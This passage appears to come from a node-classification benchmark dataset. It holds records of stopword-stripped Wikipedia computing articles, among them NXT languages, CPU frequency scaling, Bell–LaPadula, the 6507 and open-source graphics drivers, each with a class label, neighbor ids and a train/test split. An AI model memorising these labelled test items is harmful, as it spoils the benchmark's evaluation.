toolkit allow creation new sensors national instruments yet formally release update lego :nxt provides api perl nxt port gnat available nxt requires nxtosek run port includes ada bindings nxt hardware nxtosek next byte codes nbc simple open-source language assembly language syntax used program nxt brick exactly c nxc high level open-source language similar c built top nbc compiler also used program nxt brick nxc basically nqc nxt widely used third-party programming language robotc integrated development environment targeted towards students used program control lego nxt vex rcx arduino robots using programming language based c programming language robomind educational programming environment offers concise scripting language programming simulated robot internationalized scripts however also directly exported lego mindstorms robots require custom firmware order run nxtgcc gcc toolchain programming nxt firmware c. urbi parallel event-driven language interfaces c++/java matlab also component architecture uobject distributed computation urbi compatible many robots including nao cf robocup bioloid aibo lejos nxj high level open source language based java uses custom firmware developed lejos team able write c programming language /c++ nxtosek used requires custom firmware matlab simulink code nxt programming freely available pblua implementation lua programming language general purpose scripting language lego mindstorms fll nxt navigation open source program help navigation fll competition table uses nxt-g .txt files write programs ruby-nxt library program nxt ruby programming language unlike languages nxt code n't compiled binary file instead code directly transmitted nxt via bluetooth connection method execution significantly slower executing compiled code directly robotics.nxt haskell interface nxt bluetooth supports direct commands messages many sensors also unofficial also support simple message-based control nxt brick via remotely executed program basic nxc code included",
    "neighbors": [
      2691,
      8582,
      11276,
      6802,
      9748,
      9245,
      7326,
      5790,
      1952,
      3876,
      682,
      428,
      5677,
      7341,
      2045,
      9938,
      4186,
      219,
      477,
      352,
      9831,
      8554,
      7919,
      1917
    ],
    "mask": "Test"
  },
  {
    "node_id": 10965,
    "label": 0,
    "text": "WaveSurfer:wavesurfer wavesurfer audio editor widely used studies acoustic phonetics simple fairly powerful program interactive display sound pressure waveforms spectral sections spectrograms pitch tracks transcriptions read write number transcription file formats used industrial speech research including timit wavesurfer free software distributed permissive free software licence wavesurfer provides basic audio editing operations excision copying pasting zero-crossing adjustment effects fading normalization echo inversion reversal replacement silence dc-removal view scientific orientation offer effects interest musicians flange wavesurfer written tcl/tk using snack audio library therefore runs platforms including microsoft windows mac os x linux solaris hp-ux freebsd irix scriptable supports plugins",
    "neighbors": [
      6626,
      4971,
      5612,
      6797,
      7983,
      823,
      1304
    ],
    "mask": "Train"
  },
  {
    "node_id": 10966,
    "label": 3,
    "text": "Dynamic_frequency_scaling:dynamic frequency scaling dynamic frequency scaling also known cpu throttling technique computer architecture whereby frequency microprocessor automatically adjusted fly depending actual needs conserve power reduce amount heat generated chip dynamic frequency scaling helps preserve battery mobile devices decrease cooling cost noise quiet computing settings useful security measure overheated systems e.g poor overclocking dynamic frequency scaling used ranges computing systems ranging mobile systems data centers reduce power times low workload dynamic power switching power dissipated per unit time chip c·v·a·f c capacitance switched per clock cycle v voltage activity factor indicating average number switching events undergone transistors chip unit-less quantity f switching frequency voltage therefore main determinant power usage heating voltage required stable operation determined frequency circuit clocked reduced frequency also reduced dynamic power alone account total power chip however also static power primarily various leakage currents due static power consumption asymptotic execution time shown energy consumption piece software shows convex energy behavior i.e. exists optimal cpu frequency energy consumption minimal leakage current become important transistor sizes become smaller threshold voltage levels lower decade ago dynamic power accounted approximately two-thirds total chip power power loss due leakage currents contemporary cpus socs tend dominate total power consumption attempt control leakage power high-k metal-gates power gating common methods dynamic voltage scaling another related power conservation technique often used conjunction frequency scaling frequency chip may run related operating voltage efficiency electrical components voltage regulators decreases increasing temperature power usage may increase temperature since increasing power use may increase temperature increases voltage frequency may increase system power demands even cmos formula indicates vice versa dynamic frequency scaling reduces number instructions processor issue given amount time thus reducing performance hence generally used workload cpu-bound dynamic frequency scaling rarely worthwhile way conserve switching power saving highest possible amount power requires dynamic voltage scaling v component fact modern cpus strongly optimized low power idle states constant-voltage cases efficient run briefly peak speed stay deep idle state longer time called race idle computational sprinting run reduced clock rate long time stay briefly light idle state however reducing voltage along clock rate change trade-offs related-but-opposite technique overclocking whereby processor performance increased ramping processor dynamic frequency beyond manufacturer design specifications one major difference two modern pc systems overclocking mostly done front side bus mainly multiplier normally locked dynamic frequency scaling done multiplier moreover overclocking often static dynamic frequency scaling always dynamic software often incorporate overclocked frequencies frequency scaling algorithm chip degradation risks allowable intel cpu throttling technology speedstep used mobile desktop cpu lines amd employs two different cpu throttling technologies amd cool n'quiet technology used desktop server processor lines aim cool n'quiet save battery life used amd mobile processor line instead purpose producing less heat turn allows system fan spin slower speeds resulting cooler quieter operation hence name technology amd powernow cpu throttling technology used mobile processor line though supporting cpus like amd k6-2+ found desktops well via technologies processors use technology named longhaul powersaver transmeta version called longrun 36-processor asap 1 chip among first multi-core processor chips support completely unconstrained clock operation requiring frequencies maximum allowed including arbitrary changes frequency starts stops 167-processor asap 2 chip first multi-core processor chip enables individual processors make fully unconstrained changes clock frequencies according acpi specs c0 working state modern-day cpu divided so-called p -states performance states allow clock rate reduction -states throttling states throttle cpu actual clock rate inserting stpclk stop clock signals thus omitting duty cycles amd powertune amd zerocore power dynamic frequency scaling technologies gpus power saving technologies performance boosting technologies",
    "neighbors": [
      7173,
      518,
      9739,
      5649,
      2066,
      7699,
      5655,
      10779,
      9244,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      4270,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      10440,
      9932,
      5329,
      731,
      11487,
      7911,
      10985,
      9964,
      4334,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2850,
      2339,
      6950,
      810,
      3882,
      3883,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10601,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      11130,
      3457,
      398,
      3470,
      5518,
      5523,
      6549,
      407,
      409,
      10139,
      10658,
      8102,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      2516,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 10967,
    "label": 2,
    "text": "Util-linux:util-linux util-linux standard package distributed linux kernel organization use part linux operating system fork util-linux-ng—with ng meaning next generation —was created development stalled renamed back util-linux official version package includes following utilities utilities formerly included removed",
    "neighbors": [
      515,
      516,
      9733,
      11012,
      9735,
      3976,
      4750,
      2322,
      2198,
      8345,
      6812,
      7847,
      8235,
      4398,
      7983,
      823,
      1336,
      7356,
      451,
      965,
      7626,
      3659,
      8522,
      9946,
      6120,
      8938,
      491,
      10732,
      2545,
      4850,
      5106,
      5492,
      8306,
      2550,
      5110,
      9204,
      6138,
      2045,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 10968,
    "label": 4,
    "text": "Bell–LaPadula_model:bell–lapadula model bell–lapadula model blp state machine model used enforcing access control government military applications developed david elliott bell leonard j. lapadula subsequent strong guidance roger r. schell formalize u.s. department defense dod multilevel security mls policy model formal state transition model computer security policy describes set access control rules use security labels objects clearances subjects security labels range sensitive e.g. top secret least sensitive e.g. unclassified public bell–lapadula model example model clear distinction protection security bell–lapadula model focuses data confidentiality controlled access classified information contrast biba integrity model describes rules protection data integrity formal model entities information system divided subjects objects notion secure state defined proven state transition preserves security moving secure state secure state thereby inductively proving system satisfies security objectives model bell–lapadula model built concept state machine set allowable states computer system transition one state another state defined transition functions system state defined secure permitted access modes subjects objects accordance security policy determine whether specific access mode allowed clearance subject compared classification object precisely combination classification set compartments making security level determine subject authorized specific access mode clearance/classification scheme expressed terms lattice model defines one discretionary access control dac rule two mandatory access control mac rules three security properties transfer information high-sensitivity document lower-sensitivity document may happen bell–lapadula model via concept trusted subjects trusted subjects restricted star-property trusted subjects must shown trustworthy regard security policy security model directed toward access control characterized phrase read write compare biba model clark-wilson model chinese wall model bell-lapadula users create content security level i.e secret researchers create secret top-secret files may create public files write-down conversely users view content security level i.e secret researchers view public secret files may view top-secret files read-up bell–lapadula model explicitly defined scope treat following extensively strong star property alternative *-property subjects may write objects matching security level thus write-up operation permitted usual *-property present write-to-same operation strong star property usually discussed context multilevel database management systems motivated integrity concerns strong star property anticipated biba model shown strong integrity combination bell–lapadula model resulted reading writing single level tranquility principle bell–lapadula model states classification subject object change referenced two forms tranquility principle principle strong tranquility states security levels change normal operation system principle weak tranquility states security levels may never change way violate defined security policy weak tranquility desirable allows systems observe principle least privilege processes start low clearance level regardless owners clearance progressively accumulate higher clearance levels actions require",
    "neighbors": [
      11281,
      6162,
      3480,
      3360,
      3616,
      2737,
      10170,
      8259,
      5060,
      4299,
      11470,
      10835,
      3924,
      10580,
      8150,
      9958,
      4583,
      5373,
      8574
    ],
    "mask": "None"
  },
  {
    "node_id": 10969,
    "label": 3,
    "text": "MOS_Technology_6507:mos technology 6507 6507 8-bit microprocessor mos technology inc version 6502 packaged 28-pin dip makes cheaper package integrate systems reduction pin count achieved reducing address bus 16 bits 13 limiting memory 64 kb 8 kb removing number pins needed certain applications a15 a13 signals interrupt lines accessible result address 8 kb memory applications time 1975 acceptable overly restrictive entire 65xx cpu family originally conceived line low-cost microprocessors small-scale embedded systems general-purpose computers certainly interactive personal computers generally exist yet 6507 6502 chips use underlying silicon layers differ final metallisation layer ties interrupt lines inactive level vulnerable generating spurious interrupts noise first three digits chip identifier part silicon layers final digit metallisation layer micro-photography 6502 6507 shows difference 6507 widely used two applications best-selling atari 2600 video game console atari 8-bit family peripherals including 850 serial parallel interface floppy disk controllers 810 1050 disk drives 2600 system limited design rom cartridge slot allowed 4 kb external memory addressed 4 kb reserved internal ram i/o chips using minimal-cost partial decoding technique causes ram peripheral device registers mirrored throughout 4 kb machines notably home computers based 650x architecture used either standard 6502 extended rather cut versions order allow memory time 6502 line becoming widely used around 1980 rom ram semiconductor memory prices fallen point 6507 longer worthwhile simplification use new designs ceased point though atari 2600 contained continued sold early 1990s discontinued january 1 1992 however late-model atari 2600 consoles redesigned highly-integrated 2600 jr units necessarily contain separate 6507 chip might integrated cpu custom asic 6507 uses 28-pin configuration 13 address pins 8 data pins seven remaining pins used power cpu timing clock reset cpu request bus wait states rdy pin read/write commands memory mmio devices cpu irq nmi pin processor rdy pin included 28-pin cut-down versions 6502 within atari 2600 rdy used synchronise cpu television video frame function essential 'racing beam method used 6502 atari television interface adaptor chip generate television video signal response specific register access tia assert rdy extend bus cycle end current video scan line",
    "neighbors": [
      11395,
      10767,
      664,
      10784,
      4385,
      7589,
      11054,
      3010,
      3272,
      2383,
      3157,
      6485,
      5862,
      10351,
      1776,
      5617,
      7281,
      7282,
      7284,
      1660
    ],
    "mask": "Test"
  },
  {
    "node_id": 10970,
    "label": 2,
    "text": "Speech_Manager:speech manager speech manager classic mac os part operating system used convert text sound data play sound output device speaker speech manager interaction sound manager transparent software application",
    "neighbors": [
      576,
      10975,
      3533,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 10971,
    "label": 2,
    "text": "Free_and_open-source_graphics_device_driver:free open-source graphics device driver free open-source graphics device driver software stack controls computer-graphics hardware supports graphics-rendering application programming interfaces apis released free open-source software license graphics device drivers written specific hardware work within specific operating system kernel support range apis used applications access graphics hardware may also control output display display driver part graphics hardware free open-source graphics device drivers developed mesa project driver made compiler rendering api software manages access graphics hardware drivers without freely legally -available source code commonly known binary drivers binary drivers used context operating systems prone ongoing development change linux create problems end users package maintainers problems affect system stability security performance main reason independent development free open-source drivers technical documentation available understanding underlying hardware often gained clean-room reverse engineering based understanding device drivers may written legally published software license rare cases manufacturer driver source code available internet without free license means code studied altered personal use altered usually original source code freely distributed solutions bugs driver easily shared form modified versions driver therefore utility drivers significantly reduced comparison free open-source drivers objections binary-only drivers based copyright security reliability development concerns part wider campaign binary blobs openbsd lead developer theo de raadt said binary driver way fix breaks break product relies binary drivers declared end-of-life manufacturer effectively broken forever project also stated binary drivers hide bugs workarounds bugs observation somewhat vindicated flaws found binary drivers including exploitable bug nvidia 3d drivers discovered october 2006 rapid7 speculated bug existed since 2004 nvidia denied asserting issue communicated july 2006 2004 bug bug x.org nvidia driver binary drivers often work current versions open-source software almost never support development snapshots open-source software usually directly possible developer use nvidia ati proprietary drivers development snapshot x server development snapshot linux kernel features like kernel mode-setting added binary drivers anyone vendors prevents inclusion vendor lacks capacity interest linux kernel development community linus torvalds made strong statements issue binary-only modules refuse even consider tying hands binary-only module ... want people know use binary-only modules problem another kernel developer greg kroah-hartman said binary-only kernel module comply kernel license gnu general public license violates gpl due fun things like derivative works linking stuff writer computer scientist peter gutmann expressed concern digital rights management scheme microsoft windows vista operating system may limit availability documentation required write open drivers since requires operational details device kept confidential case binary drivers objections due free software philosophy software quality security concerns 2006 greg kroah-hartman concluded closed source linux kernel modules illegal simple 've misfortune talking lot different ip lawyers years topic every one 've talked agree way anyone create linux kernel module today closed source violates gpl due fun things like derivative works linking linux kernel never maintained stable in-kernel application binary interface also concerns proprietary drivers may contain backdoors like one found samsung galaxy-series modem drivers applications 3d game engine 3d computer graphics software shunt calculations cpu gpu usually use special-purpose api like opengl direct3d address hardware directly translation api calls gpu opcodes done device driver contains specialized knowledge object optimization due history rigidity proprietary driver development recent surge number community-backed device drivers desktop mobile gpus free open hardware organizations like fossi lowrisc others would also benefit development open graphical hardware standard would provide computer manufacturers hobbyists like complete royalty-free platform develop computing hardware related devices desktop computer market long dominated pc hardware using x86/x86-64 instruction set gpus available pc three major competitors nvidia amd intel main competing factor price hardware raw performance 3d computer games greatly affected efficient translation api calls gpu opcodes display driver video decoder inherent parts graphics card hardware designed assist calculations necessary decoding video streams market pc hardware dwindled seems unlikely new competitors enter market unclear much knowledge one company could gain seeing source code companies drivers mobile sector presents different situation functional blocks application-specific integrated circuit display driver 2- 3d acceleration video decoding encoding separate semiconductor intellectual property sip blocks chip since hardware devices vary substantially portable media players require display driver accelerates video decoding require 3d acceleration development goal raw 3d performance system integration power consumption 2d capabilities also approach abandons traditional method vsync updating display makes better use sample hold technology lower power consumption second quarter 2013 79.3 percent smartphones sold worldwide running version android linux kernel dominates smartphones hardware developers incentive deliver linux drivers hardware due competition incentive make drivers free open-source additional problems android-specific augmentations linux kernel accepted mainline atomic display framework adf adf feature 3.10 aosp kernels provides dma-buf-centric framework android hwcomposer hal kernel driver adf significantly overlaps drm-kms framework adf accepted mainline different set solutions addressing problems known atomic mode setting development projects libhybris harness android device drivers run linux platforms android phoronix compares free drivers source real-world testing uncommon video-game magazines report benchmark testing linux benchmarks phoronix limited scope primarily testing games available linux support automated benchmarking free open-source drivers primarily developed linux linux kernel developers third-party programming enthusiasts employees companies advanced micro devices driver five parts drm kernel-specific vesa driver generally available operating system vesa driver supports graphics cards without acceleration display resolutions limited set programmed video bios manufacturer linux graphics stack evolved detoured x window system core protocol amd proprietary driver amd catalyst radeon available microsoft windows linux formerly fglrx current version downloaded amd site linux distributions contain repositories process replaced amdgpu-pro hybrid driver combining open-source kernel x mesa multimedia drivers closed-source opengl opencl vulkan drivers derived catalyst foss drivers ati-amd gpus developed name radeon xf86-video-ati xserver-xorg-video-radeon still must load proprietary microcode gpu enable hardware acceleration radeon 3d code split six drivers according gpu technology radeon r200 r300 classic drivers r300g r600g radeonsi gallium3d drivers up-to-date feature matrix available support video coding engine unified video decoder free open-source radeon graphics device drivers reverse-engineered based documentation released amd without requirement sign non-disclosure agreement nda documentation began gradually released 2007 contrast amd main competitor graphics field nvidia proprietary driver similar amd catalyst provides support free-graphics initiatives addition providing necessary documentation amd employees contribute code support hardware features 2014 game developers conference company announced exploring strategy change re-base user-space part catalyst free open-source drm kernel module instead proprietary kernel blob components radeon graphics device driver developed core contributors interested parties worldwide 2011 r300g outperformed catalyst cases release amdgpu stack announced dri-devel mailing list april 2015 although amdgpu officially supports gcn 1.2 later graphics cards experimental support gcn 1.0 1.1 graphics cards officially supported radeon driver may enabled via kernel parameter separate libdrm libdrm-amdgpu included since libdrm 2.4.63 nvidia proprietary driver nvidia geforce driver geforce available windows xp x86-x86-64 later linux x86-x86-64-armv7-a os x 10.5 later solaris x86-x86-64 freebsd x86/x86-64 current version downloaded internet linux distributions contain repositories beta nvidia geforce driver 331.13 supports egl interface enabling support wayland conjunction driver nvidia free open-source driver named nv limited supporting 2d acceleration matthew garrett dirk hohndel others called source code confusing nvidia decided deprecate nv adding support fermi later gpus displayport march 2010 december 2009 nvidia announced would support free graphics initiatives company announced would release documentation gpus nouveau based almost entirely information gained reverse engineering project aims produce 3d acceleration x.org/wayland using gallium3d march 26 2012 nouveau drm component marked stable promoted staging area linux kernel nouveau supports tesla- earlier fermi- kepler- maxwell-based gpus nvidia employee alexandre courbot committed extensive patch set adds initial support gk20a tegra k1 nouveau june 2014 codethink reportedly ran wayland-based weston compositor linux kernel 3.15 using egl 100 open-source graphics driver stack tegra k1 feature matrix available july 2014 nouveau unable outperform nvidia geforce driver due missing re-clocking support tegra-re project working reverse-engineer nvidia vliw-based tegra series gpus predate tegra k1 nvidia distributes proprietary device drivers tegra oems part linux tegra formerly l4t development kit nvidia partner avionic design working submitting grate free open-source drivers tegra upstream mainline linux kernel april 2012 company co-founder ceo laid tegra processor roadmap ubuntu unity 2013 gpu technology conference nvidia unified memory driver nvidia-uvm.ko implements memory management pascal volta gpus linux mit licensed source code available nvidia linux driver downloads systems support nvidia-uvm.ko intel history producing commissioning open-source drivers graphics chips exception powervr-based chips 2d x.org driver called xf86-video-intel kernel mode-setting driver linux kernel use video bios switching video modes since bioses limited range modes provides reliable access supported intel video cards company worked optimizing free linux drivers performance approaching windows counterparts especially sandy bridge newer hardware performance optimizations allowed intel driver outperform proprietary windows drivers certain tasks 2011 performance enhancements may also benefit users older hardware support intel llc last level cache l4-cache crystalwell iris pro added linux kernel 3.12 company 20 30 full-time linux graphics developers matrox develops manufactures matrox mystique parhelia g200 g400 g550 although company provides free open-source drivers chipsets older g550 chipsets newer g550 supported closed-source driver s3 graphics develops s3 trio virge savage chrome supported openchrome arm holdings fabless semiconductor company licenses semiconductor intellectual property cores although known licensing arm instruction set cpus based also develop license mali series gpus january 21 2012 phoronix reported luc verhaegen driving reverse-engineering attempt aimed arm holdings mali series gpus specifically mali-200 mali-400 versions reverse-engineering project known lima presented fosdem february 4 2012 february 2 2013 verhaegen demonstrated quake iii arena timedemo mode running top lima driver may 2018 lima developer posted driver inclusion linux kernel arm indicated intention providing support graphics acceleration hardware licensed free open-source license however arm employees sent patches linux kernel support arm hdlcd display controller mali dp500 dp550 dp650 sip blocks december 2015 april 2016 imagination technologies fabless semiconductor company develops licenses semiconductor intellectual property cores among powervr gpus intel manufactured number powervr-based gpus powervr gpus widely used mobile socs company provide foss driver public documentation powervr due wide use embedded devices free software foundation put reverse-engineering powervr driver high-priority project list vivante corporation fabless semiconductor company licenses semiconductor intellectual property cores develops gcxxxx series gpus vivante proprietary closed-source linux driver consists kernel- user-space parts although kernel component open-source gpl user-space components—consisting gles 2 implementations hal library—are contain bulk driver logic wladimir j. van der laan found documented state bits command stream shader isa studying blobs work examining manipulating command-stream dumps etnaviv gallium3d driver written based documentation van der laan work inspired lima driver project produced functional-but-unoptimized gallium3d llvm driver etnaviv driver performed better vivante proprietary code benchmarks supports vivante gc400 gc800 gc1000 gc2000 gc3000 series january 2017 etnaviv added mesa opengl es 2.0 desktop opengl 2.0 support qualcomm develops adreno formerly ati imageon gpu series includes part snapdragon system phoronix slashdot reported 2012 rob clark inspired lima driver working reverse-engineering drivers adreno gpu series referenced blog post clark wrote project spare time qualcomm platform viable target working open 3d graphics employers texas instruments linaro affiliated imagination powervr arm mali cores would primary targets working command streams 2d support 3d commands seemed characteristics driver code published gitorious freedreno moved mesa 2012 working shader assembler completed demonstration versions developed texture mapping phong shading using reverse-engineered shader compiler clark demonstrated freedreno running desktop compositing xbmc media player quake iii arena fosdem february 2 2013 august 2013 kernel component freedreno msm driver accepted mainline available linux kernel 3.12 later ddx driver gained support server-managed file descriptors requiring x.org server version 1.16 july 2014 january 2016 mesa gallium3d-style driver gained support adreno 430 november year driver added support adreno 500 series freedreno used devices 96boards dragonboard 410c nexus 7 2013 traditional linux distributions like debian fedora android broadcom develops designs videocore gpu series part socs since used raspberry pi considerable interest foss driver videocore raspberry pi foundation co-operation broadcom announced october 24 2012 open-sourced arm cpu code drives gpu however announcement misleading according author reverse-engineered lima driver newly open-sourced components allowed message-passing arm cpu videocore offered little insight videocore little additional programability videocore gpu runs rtos handles processing video acceleration done rtos firmware coded proprietary gpu firmware open-sourced date since neither toolchain targeting proprietary gpu documented instruction set advantage could taken firmware source code became available videocoreiv project attempted document videocore gpus february 28 2014 raspberry pi second anniversary broadcom raspberry pi foundation announced release full documentation videocore iv graphics core complete source release graphics stack 3-clause bsd license free-license 3d graphics code committed mesa 29 august 2014 first appeared mesa 10.3 release although silicon integrated systems via technologies expressed limited interest open-source drivers released source code integrated x.org foss developers july 2008 via opened documentation products improve image linux open-source communities company failed work open-source community provide documentation working drm driver leaving expectations linux support unfulfilled january 6 2011 announced via longer interested supporting free graphics initiatives displaylink announced open-source project libdlo goal bringing support usb graphics technology linux platforms code available lgpl license integrated x.org driver displaylink graphics support available kernel udlfb driver fbdev mainline udl/drm driver march 2012 available drm-next tree non-hardware-related vendors may also assist free graphics initiatives red hat two full-time employees david airlie jérôme glisse working radeon software fedora project sponsors fedora graphics test week event launch new linux distribution versions test free graphics drivers companies provided development support include novell vmware project vga aims create low-budget open-source vga-compatible video card open graphics project aims create open-hardware gpu open graphics device v1 dual dvi-i outputs 100-pin idc connector september 2010 first 25 ogd1 boards made available grant application purchase milkymist system chip targeted embedded graphics instead desktop computers supports vga output limited vertex shader 2d texturing unit nyuzi experimental gpgpu processor includes synthesizable hardware design written system verilog instruction set emulator llvm-based c-c++ compiler software libraries tests explores parallel software hardware run terasic de2-115 field-programmable gate array board project uses fpgas generally partially completely closed-source toolchain currently couple open-source toolchains available however lattice-based fpgas notably ice40 ecp5 boards utilize project icestorm trellis respectively also larger ongoing effort create gcc fpgas called symbiflow includes aforementioned fpga toolchains well early-stage open-source toolchain xilinx-based fpgas",
    "neighbors": [
      4616,
      6153,
      3082,
      6664,
      9741,
      10255,
      4636,
      9245,
      5663,
      10785,
      546,
      6180,
      3114,
      5677,
      8242,
      5171,
      7223,
      11322,
      1083,
      6718,
      4161,
      8772,
      6213,
      3654,
      5703,
      2635,
      8268,
      589,
      1101,
      10317,
      593,
      1632,
      4192,
      10851,
      6244,
      5222,
      9320,
      10856,
      107,
      1646,
      4207,
      5747,
      5244,
      4734,
      11391,
      7810,
      132,
      3204,
      6276,
      9863,
      6797,
      4238,
      7821,
      10382,
      9366,
      2711,
      6808,
      9882,
      11418,
      3229,
      1694,
      6813,
      6818,
      2723,
      6311,
      4777,
      8364,
      692,
      10933,
      9913,
      2236,
      5822,
      5824,
      9921,
      6338,
      1736,
      2762,
      8909,
      6352,
      5335,
      4831,
      3296,
      8928,
      9953,
      2278,
      233,
      4841,
      6890,
      5356,
      237,
      7403,
      7913,
      9455,
      9964,
      10482,
      5363,
      8438,
      8439,
      2809,
      5369,
      6910,
      5386,
      1291,
      4367,
      9489,
      7442,
      2838,
      792,
      2850,
      292,
      4902,
      295,
      3883,
      7980,
      3886,
      2864,
      823,
      6968,
      1849,
      7992,
      318,
      3911,
      6988,
      10063,
      11095,
      9057,
      5988,
      10088,
      8554,
      10091,
      11630,
      11631,
      372,
      2937,
      6009,
      11130,
      8573,
      3969,
      8066,
      900,
      9604,
      8582,
      10631,
      7561,
      394,
      4493,
      3473,
      916,
      9621,
      1431,
      8602,
      11678,
      1952,
      7584,
      10658,
      1444,
      1445,
      5028,
      935,
      9637,
      4521,
      4011,
      7086,
      1456,
      1972,
      6069,
      10173,
      9151,
      10687,
      9667,
      8644,
      457,
      7626,
      5073,
      8147,
      3030,
      6622,
      2529,
      6625,
      8676,
      2021,
      1513,
      1515,
      3055,
      5105,
      8177,
      499,
      2036,
      5620,
      2550,
      8186,
      2044,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10972,
    "label": 3,
    "text": "IBM_ThinkPad_770:ibm thinkpad 770 ibm thinkpad 770 laptop designed manufactured ibm targeted business enterprise professional user last lineup thinkpad 700-series succeeding 760 high-end laptop thinkpad lineup line produced october 1997 october 1999 eventually replaced thinkpad models 390x 600x first 770s shipped either windows nt4 95 later shipped 98 pre-installed equipped ibm ultrabay ii allowing option either cd-rom floppy drive one notable feature thinkpad 770 first thinkpad available dvd-rom option addition usb port ac-3 support first 770s featured intel pentium processor running 233 mhz optional 266 mhz upgrade later models introduced intel pentium ii mobile processor 770s use certain processor socket many success installing much powerful processors generating 850 mhz although models run 1024x768 resolution later models capable 1280x1024 resolution use trident cyber 9397 graphics chips 2mb memory 770 4mb memory 770e/770ed",
    "neighbors": [
      1186,
      3304,
      780,
      3250,
      8850,
      8851,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10973,
    "label": 2,
    "text": "CocoaPods:cocoapods cocoapods application level dependency manager objective-c swift languages run objective-c runtime rubymotion provides standard format managing external libraries developed eloy durán fabio pelosin continue manage project help contributions many others began development august 2011 made first public release september 1 2011 cocoapods strongly inspired combination ruby projects rubygems bundler cocoapods focuses source-based distribution third party code automatic integration xcode projects cocoapods runs command line also integrated jetbrains appcode integrated development environment installs dependencies e.g libraries application specification dependencies rather manual copying source files besides installing many different sources “ master ” spec repository—containing metadata many open-source libraries—is maintained git repository hosted github cocoapods dependency resolution system powered molinillo also used large project bundler rubygems berkshelf following podfile example installs afnetworking cocoalumberjack libraries",
    "neighbors": [
      7430,
      9229,
      2191,
      7695,
      10771,
      1813,
      9245,
      3248,
      564,
      4277,
      9784,
      5945,
      1852,
      5567,
      11208,
      5578,
      5067,
      1379,
      10470,
      2804,
      7292
    ],
    "mask": "Test"
  },
  {
    "node_id": 10974,
    "label": 3,
    "text": "ERC32:erc32 erc32 radiation-tolerant 32-bit risc processor sparc v7 specification developed space applications developed temic acquired atmel microchip obsolete new designs used dms-r data management system russian computer russian orbital segment handles guidance navigation control onboard systems subsystems control entire iss critical tasks two versions manufactured support chip set version erc32 discontinued",
    "neighbors": [
      9857,
      9391,
      1776,
      1399,
      8508,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 10975,
    "label": 2,
    "text": "Sound_Manager:sound manager sound manager part classic apple macintosh operating system classic mac os used control production manipulation sounds macintosh computers sound manager also used parts macintosh system software produce sounds speech manager quicktime replaced core audio mac os x",
    "neighbors": [
      576,
      2921,
      7983,
      209,
      10970
    ],
    "mask": "Test"
  },
  {
    "node_id": 10976,
    "label": 4,
    "text": "Microprinting:microprinting microprinting production recognizable patterns characters printed medium scale requires magnification read naked eye unaided eye text may appear solid line attempts reproduce methods photocopy image scanning pantograph typically translate dotted solid line unless reproduction method identify recreate patterns scale microprint predominantly used anti-counterfeiting technique due inability easily reproduced digital methods microphotography precedes microprint microprint significantly influenced albert boni 1934 inspired friend writer editor manuel komroff showing experimentations related enlarging photographs occurred boni could reduce rather enlarge photographs technology might enable publication companies libraries access much greater quantities data minimum cost material storage space following decade boni worked develop microprint micro-opaque process pages photographed using 35mm microfilm printed cards using offset lithography process proved produce 6 9 index card stored 100 pages text normal sized publications reproducing boni began readex microprint company produce license technology also published article guide literature photography related subjects 1943 appeared supplemental 18th issue photo-lab index currency commonly exhibits highest quality smallest size microprint demands highest level counterfeiting deterrence example series 2004 united states 20 bill microprint hidden within border lower left corner obverse front side well twenty usa background bank cheques well various items value may also commonly leverage microprinting methods generally extreme size example personal bank cheques commonly place characters mp next signature line check characters represent microprint indicate signature line check features actually microprinted characters microprinted characters used anti-counterfeiting feature due difficulty reproduced prominent mp serves overt deterrent warning item employs microprint microprinting scales may readable human eye without microscopy differentiation microprinting different scales first us postage stamp incorporate microprinting american wildflower series introduced united states postal service 1992 also first commemorative stamp wholly produced offset lithography usps since issued stamps complex microprinting incorporated along dates words abbreviations usps even entire stamp designs composed microprint letters microprint smallest scale producible hand using engraved offset printing plates method intaglio printmaking digital microtext printers utilize specially designed fonts ink purpose ink used commonly micr magnetic ink character recognition toner particles may also polyester based toners styrene acrylate polymer based toners ink limited grayscale may also use color toners even specialized toners containing dyes sensitive ultraviolet infrared radiation producing fluorescence exposed radiations microprint scale capable printing methods produced digital printer regardless resolution device digital fonts designed specifically purpose microprinting pseudo-microprint fonts referred microtext xerox acclaimed developing microtext font claimed could produce characters 1/100th inch tall 1/100th inch equivalent 0.7227 points april 2015 videojet technologies released 1650 high resolution hr 1620 hr continuous inkjet cir printers said capable printing sub-pixel size characters small 0.6mm height equivalent 1.7007 points printers use 40-micron nozzle outputs 100,000 drops per second ink printers make microprinting faster easier produce digitally still reached true sub-pixel size less 1 point smallest scale microtext laser printer produce 0.5pt using gold nanoparticle inks glass substrate scientists concluded possible control production print patterns scale 2 microns printing nano-particle ink suspension heated using gaussian laser heated glass would expand due thermal conductivity gold nano-ink experiments able fuse nano-particles together tighter formation continuous conductive line experiments directly include font characters could translate usage",
    "neighbors": [
      10976,
      11215,
      10163,
      8839
    ],
    "mask": "Test"
  },
  {
    "node_id": 10977,
    "label": 4,
    "text": "Casync:casync casync content-addressable synchronisation linux software utility designed distribute frequently-updated file system images internet according creator lennart poettering casync inspired rsync git well tar casync aimed used internet things iot container virtual machine vm portable services operating system os images well backups home directory synchronization casync splits images variable size segments uses sha256 checksums aims work content delivery networks cdns available linux packages available ubuntu fedora arch linux similar software delivers file system images",
    "neighbors": [
      10368,
      9762,
      3428,
      3366,
      6438,
      4298,
      5482,
      7983,
      2045,
      1842,
      8214,
      823,
      2109,
      2910
    ],
    "mask": "None"
  },
  {
    "node_id": 10978,
